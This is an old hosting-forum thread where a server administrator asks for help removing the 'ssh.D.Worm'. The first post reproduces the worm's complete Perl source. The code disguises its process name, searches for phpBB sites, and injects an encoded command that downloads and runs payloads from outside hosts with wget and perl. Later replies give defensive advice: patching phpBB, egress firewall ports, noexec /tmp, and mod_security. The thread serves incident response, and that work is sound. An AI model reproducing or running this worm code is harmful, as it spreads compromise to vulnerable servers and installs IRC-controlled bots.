The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Server attack ssh.d.worm - any advice ?

Discussion in 'General Discussion' started by EMS, Jan 9, 2005.

  1. EMS

    EMS BANNED

    Joined:
    May 10, 2003
    Messages:
    250
    Likes Received:
    0
    Trophy Points:
    0
    I notice suddenly lots of processes running with high CPU so I check and they are accessing /tmp/.temp22

    There is a file in there called ssh2.htm which contains the following code...

    #/usr/bin/perl

    ################################################################################
    # ------------------------------------------------------------------------ #
    # Severino Honorato - /server irc.priv8crew.info #Priv8crew - ssh.D.Worm #
    # #
    ################################################################################


    use IO::Socket;
    use LWP::Simple;
    my $processo = "/usr/local/apache/bin/httpd - D5SL";
    $SIG{"INT"} = "IGNORE";
    $SIG{"HUP"} = "IGNORE";
    $SIG{"TERM"} = "IGNORE";
    $SIG{"CHLD"} = "IGNORE";
    $SIG{"PS"} = "IGNORE";

    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);

    while(1){
    @vul = "";
    $a=0;
    $numero = int rand(999);
    $procura = "viewtopic.php?t=$numero";

    ######################################
    for($n=1;$n<9000;$n += 105){

    @cade = get("http://search.msn.com.br/advresults.aspx?q=$procura&FORM=SMCRT&ps=ba=$n") or next;
    $ae = "@cade";
    #print $ae;
    while ($ae=~ m/<\/span><br\/><br\/><\/div><\/li><li><a href=\".*?\" class=\"t\">/){
    $ae=~ s/<\/span><br\/><br\/><\/div><\/li><li><a href=\"(.*?)\" class=\"t\">/$1/;
    $uber=$1;
    #print $uber;
    if ($uber =~/&/){
    $nu = index $uber, '&';
    $uber = substr($uber,0,$nu);
    }
    $vul[$a] = $uber;
    #print $uber."\n";
    $a++
    }
    #print 'Encontrados: '.$a.' Sites';
    }

    #########################


    $cmd = "&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd /tmp;mkdir .temp22;cd .temp22;wget http://www.quasi-sane.com/pics/bot.htm;wget http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';";

    $b = scalar(@vul);

    for($a=0;$a<=$b;$a++)
    {
    $sitevul = $vul[$a] . $cmd;
    if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }

    $teste1 = get($sitevul) or next;
    $teste1 = "";
    }
    }


    Can anyone help me stop this ? Whenever I delete the .temp22 folder it returns again minutes later. The processes build up until they eventually take up too many resources.
     
  2. philb

    philb Well-Known Member

    Joined:
    Jan 28, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Whoa, sorry no. Wrong worm. That's possibly getting in through a duff phpBB install - do you have any installs of phpBB on your server? Don't you use phpsuexec?
     
    #2 philb, Jan 9, 2005
    Last edited: Jan 9, 2005
  3. EMS

    EMS BANNED

    Joined:
    May 10, 2003
    Messages:
    250
    Likes Received:
    0
    Trophy Points:
    0
    Using php with apache - not perl.

    I dont know what keeps creating the folder - thats what I want to stop - wget is now secured on this box so it cant grab the html file but I'd like to understand what is doing this and how I can get rid of it.

    Ive seen lots of discussion in many places about this perl script but what I cant find is exactly which process is putting it there and how to stop it.
     
  4. philb

    philb Well-Known Member

    Joined:
    Jan 28, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    yes, but phpbb has a hole in that lets people put anything they like on your server - c programs (and compile them), perl, php, bash, whatever they like.

    It's getting in through a phpbb installation. If you had phpsuexec enabled on your server you'd immediately be able to see what user was running the bad version of phpBB.

    Instead you're going to have to search for every copy of viewtopic.php on your system that's part of a phpbb install (be aware phpnuke has a file called the same, and I believe old phpnuke installs may possibly be vulnerable too) and check if it's older than the 18th of november 2004. (phpnuke files have different dates in).

    Any that are dated older that 18/11/2004 need to be deleted, or you need to suspend the user(s) site(s) and tell them to update their phpbb install when you reenable it.
     
  5. InfoJunky

    InfoJunky Member

    Joined:
    May 15, 2004
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    Actually, it's able to get in via ANY php and standard apache... it's not the standard santy.c worm. From the securityfocus.com bugtraq archive (http://securityfocus.com/archive/1/385659/2004-12-23/2004-12-29/0)...
    I had an earlier version of this worm (ssh.a) and once we were able to lock it down, it finally left clues.

    The best thing to do is to first close all non-critical outbound ports and IPs in your firewall. We even temporarily disabled port 80 out to cage this bastard worm. This cuts the worms outbound traffic, as it connects to a large darknet of IRC servers. Also prevents your box from getting unplugged from the network.

    In APF:

    EGF="1"
    # Common egress (outbound) TCP ports
    EG_TCP_CPORTS="21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089"
    # Common egress (outbound) UDP ports
    EG_UDP_CPORTS="20,21,53,123,465,873"

    Next thing to do is to be sure your /tmp is properly noexec, not just the cpanel/whm version of clicking an option. The security admin that helped me track this out has a great how-to article for this at http://eth0.us/?q=node/11 .

    My server was the first time he came across this worm back on Christmas weekend. With help from the author of AFP, and a few others, he and I worked out a decent mod_security for apache. You can read http://eth0.us/?q=node/17 for more help, or contact eth00 and tell him infojunky sent ya.
     
  6. philb

    philb Well-Known Member

    Joined:
    Jan 28, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    If you read the source code for the worm, it's going off to search for

    $procura = "viewtopic.php?t=$numero";

    This is a 99.9% indicator that it is spreading via phpbb. (or the phpbb version inside phpnuke - either way).

    If your phpBB is up to date it should not be possible to be exploited with this, otherwise all the phpbb installs on all of my servers would have fallen prey to it. The PHP vulnerabilities, as far as I read it, was a different thing and afaicr you are still vulnerable if you're running old phpbb on new php.
     
  7. philb

    philb Well-Known Member

    Joined:
    Jan 28, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    I should add that yes, running APF is a very good idea indeed. There's no reason not to be running a properly locked down firewall as it makes most of these worst parts of the payload of these worms (backdoor shells, irc-controlled ddos bots) completely useless as they will be unable to do anything to the network if ingress and egress filtering is correctly configured.
     
  8. EMS

    EMS BANNED

    Joined:
    May 10, 2003
    Messages:
    250
    Likes Received:
    0
    Trophy Points:
    0
    Yes, In this case everything was fine. I use a very strict firewall config and now have fully secured tmp.

    I recently have started securing our new boxes with services from rfxnetworks and I think companies such as this are great for small businesses like us who dont have the time to become security experts.
     
Loading...

Share This Page